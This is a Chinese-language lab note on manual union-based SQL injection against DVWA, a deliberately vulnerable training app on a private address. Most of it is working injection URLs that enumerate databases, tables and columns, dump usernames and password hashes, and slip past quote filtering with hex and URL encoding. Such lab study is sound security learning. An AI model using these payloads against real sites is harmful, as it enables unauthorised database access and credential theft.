DVWA SQLi 手工注入

• 注意注入点是字符型的。然后通过order by 3确定两列字段。
  查找库名。注意group_concat 和concat的区别，concat 是会输出多个结果，group_concat 就一个结果汇聚了。
  http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(schema_name) from information_schema.schemata-- &Submit=Submit#
  或者用database()
  http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(database()) -- &Submit=Submit#

image.png

• 找表
  http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' -- &Submit=Submit#

• 找列
  http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' -- &Submit=Submit#

image.png

• 看数据
  用0x3a 代替了':'
  http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1%27%20union select 1,group_concat(user,0x3a,password) from users -- &Submit=Submit

image.png

• 笔记

·	select ？	from ?	where ?
查库名	schema_name	information_schema.schemata
查表名	table_name	information_tables	table_schema
查列名	column_name	information_columns	table_name

• 转码技巧
  原来table_name = 'users' ，如果过滤单引号的话，我们可以将users转义到十六进制加0x，然后不用单引号查询
  http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1%27%20union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 -- &Submit=Submit

或者又可以 table_name='%75%73%65%72%73'

参考链接 https://tipstrickshack.blogspot.com/2012/11/how-to-do-sql-injection-manually_7948.html